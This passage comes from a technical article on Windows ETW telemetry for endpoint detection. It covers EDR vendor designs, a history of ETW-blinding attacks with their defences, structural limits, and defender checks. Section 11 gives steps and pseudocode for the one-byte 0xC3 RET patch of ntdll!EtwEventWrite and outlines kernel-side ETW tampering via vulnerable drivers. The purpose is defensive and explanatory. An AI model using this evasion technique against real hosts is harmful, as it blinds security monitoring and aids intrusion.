    M --- M3[SentinelOne service]
    M --- M4[Sysmon service]
    M --- M5[Wazuh ETW reader]
    M --- M6[Elastic Defend service]
    K -.latency-vs-coupling axis.-> M

The CrowdStrike July 2024 channel-file outage was a kernel-driver brittleness story, not an ETW story. A channel file's Rapid Response Content template had 21 input fields while the sensor's Content Interpreter expected only 20; the Falcon kernel driver's content-update parser performed an out-of-bounds array read on the mismatch, BSOD-ing roughly 8.5 million Windows hosts [@ms-crowdstrike-2024][@crowdstrike-rca-2024]. That story belongs to the App Identity in Windows article [@paragmali-com-app-ide] in this series; it is mentioned here only to mark that the cost of the synchronous-kernel-driver path is a higher blast radius when the driver itself is buggy.

A note on Defender's cloud schema. The events that surface in Microsoft Defender for Endpoint's hunting tables -- DeviceProcessEvents, DeviceFileEvents, DeviceNetworkEvents, DeviceImageLoadEvents, DeviceRegistryEvents -- are the cloud-side abstraction over the kernel and ETW telemetry the Defender sensor collects locally. The full schema mapping from ETW provider to cloud column is out of scope here, but the substrate is the same.

Six vendors, three axes, one substrate. Now we walk the attack tradition that the substrate has to survive.

11. The attack tradition: five generations of trying to blind ETW

Every generation of ETW has been attacked. Some attacks broke a single provider; some broke every user-mode provider on a host; one would, if it worked at scale, break Defender. The defense story is on the same five-generation timeline.

Gen 1 (2014-2018): autologger registry tampering

The dispositive taxonomy is Matt Graeber and Lee Christensen's December 24, 2018 Palantir CIRT post [@palantir-tampering-wayback], preserved in the Wayback Machine because the direct Medium URL has since returned HTTP 403 to non-browser fetchers. The opening framing is verbatim:

"Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process." -- [@palantir-tampering-wayback]

Graeber and Christensen split the technique into two classes. Persistent tampering writes to the autologger registry path described in section 6, disabling a session before it ever starts at next boot; the events of interest are never captured because the session is never running. Ephemeral tampering targets a live session: stopping the session via ControlTrace, removing a provider from a session by calling EnableTraceEx2 with the EVENT_CONTROL_CODE_DISABLE_PROVIDER control code, or directly clearing the session's buffers.

The defense is direct: monitor the autologger registry surface. Sysmon Event ID 13 [@ms-sysmon] surfaces registry value-set events in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\; a SOC playbook that alerts on any unexpected write to that subtree catches the persistent class of attack reliably. Matt Graeber's authorship is cross-confirmed by the palantir/exploitguard repository [@gh-palantir-exploitguard], which credits him as the lead researcher on the ETW work.
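
A minimal sketch of the alerting rule described above, under stated assumptions: the `RegistrySetEvent` shape is a simplified stand-in for a Sysmon Event ID 13 record, and the `EXPECTED_WRITERS` baseline is hypothetical and would have to come from a real audit of the fleet.

```typescript
// Simplified, assumed shape of a registry value-set record (Sysmon Event ID 13).
interface RegistrySetEvent {
  eventId: number;      // 13 = registry value set
  image: string;        // path of the process that performed the write
  targetObject: string; // full registry path of the value written
}

// Registry paths are case-insensitive, so compare in lower case.
const AUTOLOGGER_PREFIX =
  "hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\";

// Hypothetical baseline of writers expected to touch the subtree.
const EXPECTED_WRITERS: string[] = ["c:\\windows\\system32\\svchost.exe"];

function isSuspiciousAutologgerWrite(ev: RegistrySetEvent): boolean {
  if (ev.eventId !== 13) return false;
  const path = ev.targetObject.toLowerCase();
  if (path.indexOf(AUTOLOGGER_PREFIX) !== 0) return false;
  // Inside the subtree: alert unless the writer is on the baseline.
  return EXPECTED_WRITERS.indexOf(ev.image.toLowerCase()) === -1;
}

const sampleEvents: RegistrySetEvent[] = [
  { eventId: 13, image: "C:\\Users\\Public\\tool.exe",
    targetObject: "HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application\\Start" },
  { eventId: 13, image: "C:\\Windows\\System32\\svchost.exe",
    targetObject: "HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application\\Start" },
  { eventId: 13, image: "C:\\Users\\Public\\tool.exe",
    targetObject: "HKLM\\Software\\Example\\Value" },
];

for (const ev of sampleEvents) {
  console.log(ev.image, "->", isSuspiciousAutologgerWrite(ev) ? "ALERT" : "ok");
}
```

The rule only covers the persistent class; ephemeral tampering against a live session leaves no registry write for it to see.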

Gen 2 (2020): user-mode `EtwEventWrite` 0xC3 RET patch

The technique that made ETW patching a household tradecraft term is Adam Chester's "Hiding your .NET - ETW", March 17, 2020 [@xpn-hiding-dotnet]. The mechanic is one byte:

1. Locate ntdll!EtwEventWrite (or in modern variants ntdll!NtTraceEvent) in the calling process's memory.
2. Use VirtualProtect to make the page writable.
3. Write the byte 0xC3 over the function's first byte.
4. Restore the page protection.

0xC3 is the near-return opcode [@felixcloutier-ret]: "C3 RET ZO Valid Valid Near return to calling procedure." Any caller into the function falls straight back to its return address before producing a single event. The calling process now silently fails to emit any user-mode ETW events for any provider that funnels through the patched stub -- including Microsoft-Windows-DotNETRuntime.

The technique has been re-implemented in every language that can call VirtualProtect. The fluxsec.red Rust port [@fluxsec-etw-patching] explains the modern variant verbatim:

"When a ETW Provider sends a notification, it will eventually reach into ntdll.dll for the function NtTraceEvent... we can simply patch the function address to return straight from byte 0. The opcode for a ret is C3, so we can swap out the opcode 4C with C3 to immediately return out of the stub." -- [@fluxsec-etw-patching]

Here is the structure of the patch in TypeScript pseudocode -- not actually runnable Win32, but mirroring exactly what a Windows binary would do:

{`
// Pseudocode: silence user-mode ETW for the calling process.
// This silences only the calling process and only user-mode providers
// that funnel through the patched stub.

// 1. Resolve the address of ntdll!EtwEventWrite in this process.
const ntdll = getModuleHandle("ntdll.dll");
const fn = getProcAddress(ntdll, "EtwEventWrite");

// 2. Make the function's first page writable.
const PAGE_EXECUTE_READWRITE = 0x40;
let oldProtect = 0;
virtualProtect(fn, 1, PAGE_EXECUTE_READWRITE, /* out */ ref(oldProtect));

// 3. Write 0xC3 (RET) over the first byte. Caller now returns immediately.
writeByte(fn, 0xC3);

// 4. Restore original page protection.
virtualProtect(fn, 1, oldProtect, /* out */ ref(oldProtect));

// Limits:
// - Silences only this process.
// - Silences only providers whose emit path funnels through this stub.
// - Cannot silence kernel-emitted providers like Microsoft-Windows-Threat-Intelligence.
`}

Note: The patch operates on the calling process's user-mode trampoline. Other processes on the host are unaffected; their ETW emissions continue normally. Kernel-emitted providers like Microsoft-Windows-Threat-Intelligence are unaffected even in the patched process; they fire from the kernel side of the syscall path, after control has crossed the user/kernel boundary, on a code path the user-mode patcher cannot reach without first achieving kernel execution.
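
The same one-byte mechanic suggests a simple integrity check from the defender's side: compare the function's first bytes in memory against the bytes of the same function in the on-disk image. The sketch below assumes the caller has already obtained both byte arrays (how is out of scope), and the sample prologue bytes are illustrative placeholders rather than the real ntdll prologue.

```typescript
const RET_NEAR = 0xc3; // near-return opcode

interface PrologueCheck {
  patched: boolean;       // in-memory bytes differ from the on-disk bytes
  startsWithRet: boolean; // in-memory prologue begins with RET, on-disk does not
}

function checkPrologue(onDisk: Uint8Array, inMemory: Uint8Array): PrologueCheck {
  // Compare only the overlapping prefix of the two buffers.
  const n = Math.min(onDisk.length, inMemory.length);
  let patched = false;
  for (let i = 0; i < n; i++) {
    if (onDisk[i] !== inMemory[i]) {
      patched = true;
      break;
    }
  }
  const startsWithRet =
    n > 0 && inMemory[0] === RET_NEAR && onDisk[0] !== RET_NEAR;
  return { patched, startsWithRet };
}

// Placeholder bytes: a clean prologue and the same prologue after the patch.
const cleanPrologue = new Uint8Array([0x4c, 0x8b, 0xdc, 0x48]);
const patchedPrologue = new Uint8Array([0xc3, 0x8b, 0xdc, 0x48]);

console.log(checkPrologue(cleanPrologue, cleanPrologue));
console.log(checkPrologue(cleanPrologue, patchedPrologue));
```

A mismatch is a signal rather than a verdict: legitimate security products also hook function prologues, so a real check would need an allow-list of known hooks.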

Gen 3 (2021-2023): kernel-mode primitives

If a user-mode patch cannot reach EtwTi, can a kernel-mode patch? Yes -- but the attacker first needs kernel execution. The most common path is BYOVD [@paragmali-com-in-windows]: load a signed but vulnerable driver and use its primitive to read or write kernel memory. Once you can write kernel memory you can target ETW's internal data structures directly.

Binarly's Black Hat Europe 2021 talk [@binarly-edr] documents the surface verbatim:

"Many ways to disable ETW logging are publicly available from passing a TRUE boolean parameter into a `nt!EtwpStopTrace` function to finding an ETW specific structure and dynamically modifying it or patching `ntdll!ETWEventWrite` or `advapi32!EventWrite` to return immediately thus stopping the user-mode loggers." -- [@binarly-edr]

The kernel-side primitives Binarly enumerates target the _ETW_GUID_ENTRY structure for a provider, the EtwpRegistration linked list of registered providers, and the EtwpEventTracingProhibited flag the kernel checks before emitting events. Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir] provides the contemporary kernel-side data structure walk through _ETW_REALTIME_CONSUMER and _ETW_SILODRIVERSTATE, and notes:

"Most recently, the Lazarus Group bypassed EDR detection by disabling ETW providers" -- [@trailofbits-shafir]

The architectural-level treatment is well-documented; the specific kernel offsets that change between Windows builds are a moving target. We treat the technique class as well-established and the per-build offset details as out of scope.

Defense Gen 1 (2017): Antimalware-PPL + ELAM gate on EtwTi

Section 9 covered this in detail. The point to record here, in the attack-tradition timeline, is that the Antimalware-PPL gate predates the Adam Chester 2020 user-mode patch by three years. Microsoft did not respond to Chester's post; they had already put the load-bearing security signal structurally out of reach of any user-mode patch in the calling process. The user-mode patch class is generic against Microsoft-Windows-DotNETRuntime and the rest of the user-mode catalogue; it is structurally impotent against Microsoft-Windows-Threat-Intelligence.

Defense Gen 2 (2022): Vulnerable Driver Blocklist on by default

The kernel-mode primitive class needs a kernel write. Without a vulnerability in the EDR's kernel driver, the realistic path is BYOVD: load a third-party signed driver that exposes a memory-write primitive. The structural defense is Microsoft's Vulnerable Driver Blocklist [@ms-vdb]:

"Since the Windows 11 2022 update, the vulnerable driver blocklist is enabled by default for all devices, and can be turned on or off via the Windows Security app... the vulnerable driver blocklist is also enforced when either memory integrity, also known as hypervisor-protected code integrity (HVCI), Smart App Control, or S mode is active... The blocklist is updated quarterly. In addition, blocklist updates are delivered through the monthly Windows updates as part of the standard servicing process." -- [@ms-vdb]

The blocklist enumerates known-vulnerable signed drivers by hash; the kernel refuses to load anything on the list. On a Windows 11 22H2-or-later host with the default settings, the BYOVD primitive against most known-vulnerable drivers is closed. With HVCI on, the closure is enforced even against attackers who would otherwise try to load drivers via legacy paths. The empirical bound is the LOLDrivers project's catalogue of known-vulnerable drivers; the blocklist tracks public discovery with a lag of approximately one quarter, which is the residual window an attacker can exploit before a freshly disclosed driver is added.

BYOVD (Bring Your Own Vulnerable Driver): The attack pattern of loading a known-vulnerable but signed driver to obtain a kernel-mode primitive (memory read, memory write, or arbitrary code execution). Used in real-world EDR-blinding attacks, including by the Lazarus Group as cited in Trail of Bits' 2023 ETW walk [@trailofbits-shafir].

Vulnerable Driver Blocklist: The Microsoft-maintained blocklist of known-vulnerable signed drivers, by hash. Enabled by default on Windows 11 22H2 and later. Enforced more strictly when HVCI, Smart App Control, or S mode is active. Updated quarterly per the Microsoft Learn primary [@ms-vdb].

The LOLDrivers project [@loldrivers] is the empirical anchor for the BYOVD lag story. It catalogues known-vulnerable signed drivers as a community resource. The Microsoft blocklist updates quarterly, but blocklist updates are also delivered through monthly Windows servicing, so a freshly disclosed driver can remain loadable for as little as about one month (when its hash ships via Patch Tuesday) or for up to a full quarter before its hash is added.
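
The arithmetic behind that window can be sketched in a few lines. Everything here is an assumption for illustration: the dates are hypothetical, and the model optimistically assumes a driver's hash lands in the very next update after disclosure.

```typescript
const MS_PER_DAY = 24 * 60 * 60 * 1000;

// Days between disclosure and the first blocklist update on or after it.
// Returns null when no later update is known.
function exposureDays(disclosedIso: string, updateDatesIso: string[]): number | null {
  const disclosed = Date.parse(disclosedIso); // date-only ISO strings parse as UTC
  let next: number | null = null;
  for (const iso of updateDatesIso) {
    const t = Date.parse(iso);
    if (t >= disclosed && (next === null || t < next)) {
      next = t;
    }
  }
  return next === null ? null : Math.round((next - disclosed) / MS_PER_DAY);
}

// Hypothetical schedules: one quarterly, one monthly.
const quarterly = ["2026-01-01", "2026-04-01", "2026-07-01"];
const monthly = ["2026-01-13", "2026-02-10", "2026-03-10"];

console.log("quarterly window (days):", exposureDays("2026-01-15", quarterly));
console.log("monthly window (days):", exposureDays("2026-01-15", monthly));
```

The gap between the two results is the practical difference between relying on the quarterly refresh and picking up blocklist updates through monthly servicing.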

flowchart LR subgraph Attacks A1["Gen 1 2014-2018: Autologger registry tampering -- Palantir CIRT taxonomy"] A2["Gen 2 2020: EtwEventWrite 0xC3 RET -- Adam Chester"] A3["Gen 3 2021-2023: Kernel _ETW_GUID_ENTRY -- EtwpRegistration EtwpStopTrace via BYOVD"] end subgraph Defenses D1["Sysmon Event ID 13 -- monitor Autologger subtree"] D2["Antimalware-PPL plus ELAM -- gate on EtwTi 2017"] D3["Vulnerable Driver Blocklist -- default-on Win11 22H2 plus HVCI"] end A1 --> D1 A2 --> D2 A3 --> D3

The 2026 picture

User-mode patching cannot reach the kernel-mode provider that EDR cares about. The BYOVD primitive that could reach it is structurally narrowed by default on supported hardware. The remaining gap is the long tail of newly-disclosed vulnerable drivers between disclosure and blocklist update, plus any custom kernel zero-day an attacker discovers in an EDR's own driver. Both are real, both are exploited in the wild, neither is the universally-applicable evasion the 2020-era user-mode patch class was.

That is the operational story. But ETW has structural limits even when no attacker is patching anything.

12. Theoretical limits: what ETW cannot see, even with every defence engaged

Even on a perfectly-configured Windows 11 box -- HVCI [@paragmali-com-in-windows] on, Vulnerable Driver Blocklist on, Antimalware-PPL Defender consuming EtwTi, third-party EDR ELAM-onboarded -- there are events ETW does not emit. Some are observed too late. Some are not observed at all.

There are three structural ceilings.

Pre-ETW kernel paths

The Global Logger session is one of the earliest things to come up at boot, but it is not the first. Some early-init driver paths run before any ETW session exists; they cannot be traced via ETW. Measured Boot is the discipline that records this prefix into TPM PCRs, with attestation handled by the platform integrity layer rather than by ETW. The implication for EDR is that any malicious code executing during early boot, before the Global Logger session is up, is invisible to ETW.

Incomplete EtwTi syscall coverage

The 10 KERNEL_THREATINT_TASK_* task IDs are the public surface. The underlying syscall set the kernel actually instruments is not exhaustively documented. The fluxsec.red inventory [@fluxsec-eti] is the public surface, not the private one. Some syscalls are clearly covered (NtAllocateVirtualMemory for cross-process allocation surfaces as KERNEL_THREATINT_TASK_ALLOCVM); some have partial coverage (MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords cover some but not all of the section-mapping primitive set across NtCreateSection, NtMapViewOfSection, NtMapViewOfSectionEx, image-section vs file-section variants); some are not enumerated at all in the public manifest. Process-hollowing primitives that combine NtUnmapViewOfSection and NtMapViewOfSection may be partially covered depending on which path the attacker takes.

The async-flush gap

ETW's per-CPU ring buffer is asynchronous. If a process allocates RWX memory, writes shellcode, executes it, and returns within one writer-thread flush interval, the event is recorded but the attacker's payload has already executed. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. The Microsoft Learn primary on About Event Tracing [@ms-about-etw] is explicit that events can be lost:

"Events can be lost if any of the following conditions occur ... The total event size is greater than 64K ... The disk is too slow to keep up with the rate at which events are being generated. ... For real-time logging, the real-time consumer is not consuming events fast enough." -- [@ms-about-etw]

No ETW-only EDR can prevent a syscall whose payload completes inside one writer flush. EDRs that ship a kernel driver and register synchronous callbacks (CrowdStrike, SentinelOne, Sysmon, Elastic Defend) can deny operations through the PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] CreationStatus field; ETW-only EDRs cannot. ETW is observation, not enforcement.
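
A toy timeline model makes the gap concrete. It is a sketch, not a description of ETW internals: it assumes flushes happen on a fixed tick, that a consumer first sees an event at the first tick at or after the event was written, and the flush interval and timings are arbitrary example values.

```typescript
interface FlushTimeline {
  consumerSeesAtMs: number;       // first flush tick at or after the event
  payloadDoneAtMs: number;        // when the payload finished executing
  seenBeforePayloadDone: boolean; // did the consumer see it in time to react?
}

function modelFlushGap(
  eventAtMs: number,
  payloadDurationMs: number,
  flushIntervalMs: number
): FlushTimeline {
  const consumerSeesAtMs =
    Math.ceil(eventAtMs / flushIntervalMs) * flushIntervalMs;
  const payloadDoneAtMs = eventAtMs + payloadDurationMs;
  return {
    consumerSeesAtMs,
    payloadDoneAtMs,
    seenBeforePayloadDone: consumerSeesAtMs < payloadDoneAtMs,
  };
}

// A 5 ms payload starting at t=1250 ms with a 1000 ms flush tick.
console.log(modelFlushGap(1250, 5, 1000));
// A long-running payload is at least observable while it is still running.
console.log(modelFlushGap(1250, 2000, 1000));
```

Even in the second case the consumer can only react after the fact; the model says nothing about denial, which ETW does not offer.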

Key idea: ETW is observation, not enforcement. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. Sub-microsecond payloads execute before the writer thread flushes; the layered defense stack of 2026 is an empirical bar, not a theoretical guarantee.

HVCI (hypervisor-protected code integrity): The VBS-backed code-integrity enforcement for kernel-mode code on Windows. With HVCI enabled, the hypervisor enforces that only signed kernel pages can execute. Closes the attack class that loads unsigned drivers; combined with the Vulnerable Driver Blocklist it closes most of the realistic BYOVD primitive surface as well.

The "events can be lost" enumeration in [@ms-about-etw] is the dispositive Microsoft acknowledgement of ETW's lossy substrate. SOC playbooks should treat ETW telemetry as best-effort, not as a guaranteed audit trail. Forensic claims that depend on completeness need an independent corroborating source.

Note: A detection-only EDR can alert on a malicious operation, but only after the operation has happened. By the time the SOC sees the alert, the syscall has completed, the shellcode has executed, the credentials have been stolen. This is why the kernel-callback path (with its ability to deny via CreationStatus) coexists with ETW even though ETW is more flexible: a SOC playbook needs both the speed of denial and the breadth of observation.

The 2026 layered stack -- Antimalware-PPL + EtwTi + HVCI + VBL -- raises the empirical bar enormously. It does not close the architectural gap. Sub-microsecond payloads still execute before the writer thread flushes. The BYOVD primitive on a non-HVCI box still defeats the kernel-callback layer. There are still problems the substrate cannot solve in principle.

Those are the limits we can describe. The next section is about the limits we cannot yet measure.

13. Open problems: keyword drift, secure kernel ETW, and the BYOVD arms race

The 2026 state of the art has five active open problems. Each has a partial workaround; none has a complete solution.

1. EtwTi keyword inventory drift across builds

Microsoft has not published a complete, current Microsoft-Windows-Threat-Intelligence keyword inventory. The community-maintained references -- the jdu2600 cross-build inventory [@gh-jdu2600] and the repnz manifest archive [@gh-repnz] -- are partial coverage and lag Microsoft's quarterly servicing cadence. EDR vendors that hard-code keyword bitmasks against an old build can silently miss events on newer builds because the keyword definitions have shifted underneath them. Detection engineers writing rules against KERNEL_THREATINT_TASK_* IDs that move between builds can get false negatives.
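
One partial workaround is to diff the keyword tables extracted from two builds before shipping a hard-coded mask. The sketch below assumes the tables have already been extracted into name-to-bitmask maps; the mask values are made up for illustration, and `EXAMPLE_NEW_KEYWORD` is a hypothetical name.

```typescript
// Keyword name -> bitmask, kept as hex strings because ETW keywords are 64-bit.
type KeywordMap = Record<string, string>;

interface KeywordDrift {
  added: string[];   // present only in the new build
  removed: string[]; // present only in the old build
  moved: string[];   // present in both, but with a different bitmask
}

function hasKey(m: KeywordMap, k: string): boolean {
  return Object.prototype.hasOwnProperty.call(m, k);
}

function diffKeywordMaps(oldBuild: KeywordMap, newBuild: KeywordMap): KeywordDrift {
  const drift: KeywordDrift = { added: [], removed: [], moved: [] };
  for (const name of Object.keys(oldBuild).sort()) {
    if (!hasKey(newBuild, name)) {
      drift.removed.push(name);
    } else if (newBuild[name] !== oldBuild[name]) {
      drift.moved.push(name);
    }
  }
  for (const name of Object.keys(newBuild).sort()) {
    if (!hasKey(oldBuild, name)) {
      drift.added.push(name);
    }
  }
  return drift;
}

// Illustrative values only; not taken from any real manifest.
const buildA: KeywordMap = { MAPVIEW_LOCAL: "0x100", MAPVIEW_REMOTE: "0x200" };
const buildB: KeywordMap = {
  MAPVIEW_LOCAL: "0x100",
  MAPVIEW_REMOTE: "0x400",
  EXAMPLE_NEW_KEYWORD: "0x200",
};

console.log(diffKeywordMaps(buildA, buildB));
```

A non-empty `moved` list is the dangerous case: a mask hard-coded against the old build would silently select a different keyword on the new one.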

There are three plausible reasons for the missing inventory, and Microsoft has not stated which (or which combination) is operative. *Operational secrecy*: a complete keyword inventory tells attackers exactly which syscall paths are observed and which are not, narrowing the search for evasion paths. *Documentation cost*: the inventory shifts every build, and maintaining a synchronised public reference is engineering work without an obvious internal champion. *Deliberate moving target*: keeping the public surface incomplete forces attackers to reverse-engineer per build, raising the cost of stable evasion. The community references partially defeat all three rationales, yet the official inventory remains unpublished.

2. Secure ETW (the `EtwSi*` family)

Windows VBS Trustlets run in the Secure Kernel (VTL1), insulated from the normal-world kernel (VTL0) by the hypervisor. The Secure Kernel exposes its own ETW family for VTL1 components; this is enumerated in fragments in Alex Ionescu's BlackHat 2015 deck on the Secure Kernel and in subsequent BlueHatIL talks. There is no public consumer-facing primary on EtwSi* in 2026. Cross-link: this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] covers the producer side of the story.

3. Forensic soundness of ETW telemetry

ETW is lossy by design (per the [@ms-about-etw] enumeration). Whether ETW-derived telemetry is forensically sound -- chain-of-custody complete, lossless under load, attestable as untampered between event emission and SIEM ingestion -- is an open question. Courts have not ruled. The current best partial result is to treat ETW as supporting evidence and require independent corroboration (file-system snapshots, network captures, OS state captures) for any claim that depends on completeness. Sysmon's Event ID 16 (Sysmon configuration changed) [@ms-sysmon] and the autologger registry write events on HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ are useful integrity signals: an attacker who silenced ETW typically leaves a footprint here.

4. The BYOVD arms race

The Vulnerable Driver Blocklist [@ms-vdb] is hash-based and updated quarterly. The LOLDrivers project [@loldrivers] documents the public catalogue of known-vulnerable signed drivers. The gap between disclosure and blocklist update -- as short as ~1 month via Patch Tuesday or up to a full quarter -- is the residual exploitation window. The deeper structural issue is that a hash-based deny-list only knows drivers already reported as vulnerable; an attacker who finds a new vulnerability in a previously-trusted signed driver enjoys a fresh window every quarter. Closing this gap requires either a different trust model (allow-listing of known-good drivers, as Smart App Control does for executables) or behavioural detection of suspicious driver loads. Both are active areas of work.
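
The difference between the two trust models fits in a few lines. This is a conceptual sketch only: the hash strings are placeholders, and real enforcement involves signer and version rules that are not modelled here.

```typescript
type LoadVerdict = "load" | "block";

// Deny-list model: anything not known to be bad is allowed.
function denyListVerdict(driverHash: string, denyList: string[]): LoadVerdict {
  return denyList.indexOf(driverHash) !== -1 ? "block" : "load";
}

// Allow-list model: anything not known to be good is refused.
function allowListVerdict(driverHash: string, allowList: string[]): LoadVerdict {
  return allowList.indexOf(driverHash) !== -1 ? "load" : "block";
}

// Placeholder hashes for illustration.
const knownVulnerable = ["hash-old-vulnerable-driver"];
const knownGood = ["hash-vendor-driver-v2"];

// A signed driver whose vulnerability was disclosed yesterday: on neither list.
const freshlyDisclosed = "hash-freshly-disclosed-driver";

console.log("deny-list:", denyListVerdict(freshlyDisclosed, knownVulnerable));
console.log("allow-list:", allowListVerdict(freshlyDisclosed, knownGood));
```

The deny-list lets the unknown driver load until someone adds its hash; the allow-list refuses it by default, at the cost of maintaining the list of everything legitimate.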

5. Cross-process section-mapping coverage

EtwTi's KERNEL_THREATINT_TASK_MAPVIEW covers some but not all section-mapping primitives. The public fluxsec.red [@fluxsec-eti] inventory lists MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords, but the underlying syscall set (NtMapViewOfSection, NtMapViewOfSectionEx, NtCreateSection, image-section vs file-section variants) is not exhaustively documented. Detection engineers who depend on full coverage of cross-process section mapping are working from an incomplete map.

What would a v2 ETW look like?

A theoretical ideal: synchronous kernel-emitted events on every security-relevant syscall, with the consumer running in VTL1 (Secure Kernel) so even a kernel-mode attacker in VTL0 cannot tamper with the consumer. The EtwSi* family is the partial realisation. The full ideal is incompatible with x64 syscall performance: synchronous notification on every syscall would dominate the cost of the syscall itself. The pragmatic answer Microsoft has been building toward is selective synchronous notification (the kernel notify routines for high-value control points) layered with broad asynchronous observation (ETW for everything else), with the most security-critical of the broad observations promoted to PPL/ELAM-gated kernel-emitted producers (EtwTi). Two decades of layering, no single architectural endpoint.

For the producer side of the Secure Kernel ETW story (EtwSi*), see this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] in the same series. The Trustlet-side architecture is a separate topic large enough to need its own walkthrough.

Open problems are interesting but they are not actionable. The next section is about what an engineer can do on Monday morning.

14. Practical guide: five things to do Monday morning

You have read 12,000 words about ETW. Here are five concrete checks an engineer can run on a Windows host this morning.

Note: logman query providers enumerates every registered provider on the host. Cross-reference the output against the section 8 catalogue and flag any security-relevant provider your EDR is not consuming. Pay specific attention to Microsoft-Antimalware-Scan-Interface, Microsoft-Windows-PowerShell, Microsoft-Windows-DotNETRuntime, and Microsoft-Windows-Sysmon if Sysmon is installed. Missing coverage of any of these on a host you are responsible for is a detection-coverage gap, not a configuration issue.

Note: Run wevtutil gp Microsoft-Windows-Threat-Intelligence to confirm the provider is registered and inspect its keyword definitions. Then check whether your EDR is actually a consumer: walk the live-debugger handle enumeration in Yarden Shafir's Trail of Bits post [@trailofbits-shafir] (the WinDbg JS scripts are linked from the post). If your EDR is supposed to be ELAM-onboarded but does not appear in the consumer enumeration for an EtwTi logger session, your installation may have lost the gate. This is the difference between a configured EDR and a functional EDR.

Note: Enumerate HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ for unauthorised session entries. Per the Palantir CIRT taxonomy [@palantir-tampering-wayback], this is the persistent-tampering surface. A baseline audit should produce a known list of expected sessions (Defender, your EDR, Sysmon if installed, the standard Windows diagnostic listeners). Any subkey not on the baseline list is an investigation candidate. Sysmon Event ID 13 (registry value set) [@ms-sysmon] on this subtree is a high-signal alert in any SIEM.

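Note: Run Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard | Select-Object SecurityServicesConfigured, SecurityServicesRunning, VirtualizationBasedSecurityStatus to check whether VBS and HVCI are active. The class lives in that namespace rather than the default root\cimv2, so the query fails without the -Namespace argument; a value of 2 in SecurityServicesRunning indicates HVCI. Per the Microsoft Learn primary [@ms-vdb], the Vulnerable Driver Blocklist is also enforced whenever HVCI is active, so this check covers the BYOVD ceiling that serves as your kernel-tampering integrity guarantee. If VBS is Off on a managed endpoint, your detection coverage is structurally weaker than it should be on supported hardware. Treat it as a hardening item, not a nice-to-have.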
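
For fleet-wide triage, the three properties can be interpreted programmatically once exported (for example as JSON). The sketch below assumes the commonly documented value meanings for Win32_DeviceGuard: 2 in the services arrays for HVCI, and 2 in VirtualizationBasedSecurityStatus for "enabled and running". The sample JSON is hypothetical.

```typescript
interface DeviceGuardState {
  SecurityServicesConfigured: number[];
  SecurityServicesRunning: number[];
  VirtualizationBasedSecurityStatus: number;
}

const HVCI_SERVICE = 2; // memory integrity (assumed documented value)
const VBS_RUNNING = 2;  // VBS enabled and running (assumed documented value)

interface HardeningSummary {
  vbsRunning: boolean;
  hvciRunning: boolean;
  hvciConfiguredOnly: boolean; // configured by policy but not actually running
}

function summarizeDeviceGuard(s: DeviceGuardState): HardeningSummary {
  const vbsRunning = s.VirtualizationBasedSecurityStatus === VBS_RUNNING;
  const hvciRunning = s.SecurityServicesRunning.indexOf(HVCI_SERVICE) !== -1;
  const hvciConfigured = s.SecurityServicesConfigured.indexOf(HVCI_SERVICE) !== -1;
  return {
    vbsRunning,
    hvciRunning,
    hvciConfiguredOnly: hvciConfigured && !hvciRunning,
  };
}

// Hypothetical export from one endpoint.
const exported =
  '{"SecurityServicesConfigured":[1,2],"SecurityServicesRunning":[1],"VirtualizationBasedSecurityStatus":2}';
const state = JSON.parse(exported) as DeviceGuardState;

console.log(summarizeDeviceGuard(state));
```

The `hvciConfiguredOnly` flag is the interesting one for a hardening backlog: policy asked for HVCI, but the endpoint is not running it.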

Note: Write a hunting query for the pattern: "process X registers as ETW consumer for Microsoft-Windows-Threat-Intelligence and X is not on the EDR allow-list." The provider's PPL+ELAM gate makes this a high-signal alert: only a signed Antimalware-PPL service can pass the gate, so an unexpected process holding an EtwConsumer handle to the TI logger ID is either a misconfigured tool, a legitimate research session you forgot about, or an attacker chain that has acquired Antimalware-PPL trust on your fleet. The first two are quick to triage; the third is an incident.

The structure of the check in pseudocode -- mirroring the WinDbg JS approach in [@trailofbits-shafir]:

{`
// Pseudocode: inventory providers and identify EtwTi consumers.

// 1. Enumerate registered providers and find Microsoft-Windows-Threat-Intelligence.
const providers = enumerateRegisteredProviders();
const tiProvider = providers.find(p => p.guid === "{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}");
if (!tiProvider) {
  warn("EtwTi provider not registered on this host");
}

// 2. Enumerate live trace sessions and find any that subscribe to TI.
const sessions = enumerateLoggerSessions(); // logman query -ets equivalent
const tiSessions = sessions.filter(s => s.providers.some(p => p.guid === tiProvider?.guid));

// 3. Walk EtwConsumer handles for each TI session; identify the consuming processes.
const expectedConsumers = ["MsMpEng.exe", "CSFalconService.exe", "SentinelAgent.exe"];
for (const session of tiSessions) {
  const consumers = enumerateEtwConsumers(session.loggerId); // Shafir WinDbg JS
  for (const consumer of consumers) {
    if (!expectedConsumers.includes(consumer.processName)) {
      alert(`Unexpected EtwTi consumer: ${consumer.processName} (PID ${consumer.pid})`);
    }
  }
}

// 4. Audit autologger persistence entries against a known baseline.
const baseline = loadAutologgerBaseline();
const live = enumerateAutologgerSubkeys(); // HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger
for (const entry of live) {
  if (!baseline.includes(entry.name)) {
    alert(`Unexpected autologger entry: ${entry.name}`);
  }
}
`}

With those five checks, the catalogue is no longer an abstraction. You have an inventory of what your host emits, an inventory of who consumes the most security-critical provider, an audit of the persistence surface that defines what gets emitted at all, a confirmation of the integrity layer that closes BYOVD, and a hunt for anyone who has somehow obtained the passport. Now we close with the questions every reader should expect to have.

15. Frequently asked questions

